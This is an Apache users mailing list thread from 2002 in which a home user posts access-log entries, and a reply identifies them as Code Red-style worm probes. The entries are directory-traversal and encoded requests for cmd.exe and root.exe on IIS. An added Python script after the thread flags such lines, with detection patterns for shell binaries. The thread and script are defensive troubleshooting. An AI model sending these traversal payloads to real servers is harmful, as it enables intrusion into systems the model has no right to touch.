httpd-users mailing list archives

From "Robert Douglass" <r.dougl...@onlinehome.de>
Subject Re: access log
Date Fri, 19 Apr 2002 09:07:12 GMT
Steve,
Thank you for the information. I'm not a trained system administrator, and I
have to admit, I don't know what you mean by "try some checks on the input and
redirect if you find any exploit attempts". I am on a Win32 system (2000
pro).
-R.D.
----- Original Message -----
From: "Steve Leach" <sleach@askalix.com>
To: <users@httpd.apache.org>
Sent: Friday, April 19, 2002 10:55 AM
Subject: Re: access log


> This is Code Red or something like it.
> See the following: http://www.cert.org/advisories/CA-2001-19.html
> Note that Apache should be fine - also that if you are running *nix you are
> OK.
> If on a Win32 system you could try some checks on the input and redirect if
> you find any exploit attempts!!!
>
> Best Regards,
>
> Steve Leach
> Network Manager
> Mi-Int Limited
> Eaglescliffe Logistics Centre
> Durham Lane
> Egglescliffe
> URL: http://www.askalix.com
> TEL: 01642 356205
> e-mail: sleach@askalix.com
>
> ----- Original Message -----
> From: "Robert Douglass" <r.douglass@onlinehome.de>
> To: <users@httpd.apache.org>
> Sent: Friday, April 19, 2002 9:43 AM
> Subject: access log
>
>
> > Hello, I've been hosting a tiny website from my home for the past week, as a
> > temporary project, and I found the following in my access log:
> >
> > "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> > "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> > "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
> > "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> >
> > Does anybody have an idea what someone was trying to accomplish with this,
> > or if these requests may have originated from my ISP? Does anybody have any
> > suggestions on how to implement some basic security (I've done nothing!) to
> > protect myself? I'm using Apache 1.3.22. Thank you,
> >
> > Robert Douglass
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
>
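
Added example, not part of either poster's message and not Apache project code: one way to triage request lines like the ones quoted above from an access log. It percent-decodes each request path until it stops changing, then reports why a line looks like a worm probe. The function names, reason labels and the two benign lines are made up for this illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Fragments copied from the log in the message, plus two constructed benign lines.
SAMPLE_LINES = [
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312',
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311',
    '"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295',
    '"GET /index.html HTTP/1.0" 200 1456',          # constructed
    '"GET /docs/my%20file.html HTTP/1.0" 200 512',  # constructed
]

REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# ".." as a whole path segment; 0xC0/0xC1 count as separators because they
# start the overlong encodings of "/" and "\" seen in these probes.
TRAVERSAL = re.compile(rb'(?:^|[/\\])\.\.(?:[/\\\xc0\xc1]|$)')
SHELL_NAMES = {b"cmd.exe", b"root.exe"}

def decode_layers(raw, max_rounds=4):
    """Percent-decode until stable; return (bytes, number of decoding rounds)."""
    data, rounds = raw.encode("utf-8"), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data, rounds

def triage(line):
    """Return (status, sorted reasons) for one log line, or None if unparsable."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, rounds = decode_layers(m["target"].split("?", 1)[0])
    reasons = set()
    if rounds > 1:
        reasons.add("multi-encoded")        # e.g. %255c -> %5c -> \
    if b"\xc0" in path or b"\xc1" in path:
        reasons.add("overlong-utf8")        # 0xC0/0xC1 never occur in valid UTF-8
    if TRAVERSAL.search(path):
        reasons.add("traversal")
    if path.replace(b"\\", b"/").rsplit(b"/", 1)[-1].lower() in SHELL_NAMES:
        reasons.add("shell-binary")
    return int(m["status"]), sorted(reasons)

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(triage(line), line)
```

A flagged line with a 404 or 400 status, as in the log above, means the server refused the request; a flagged line with a 200 status is the one to investigate.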

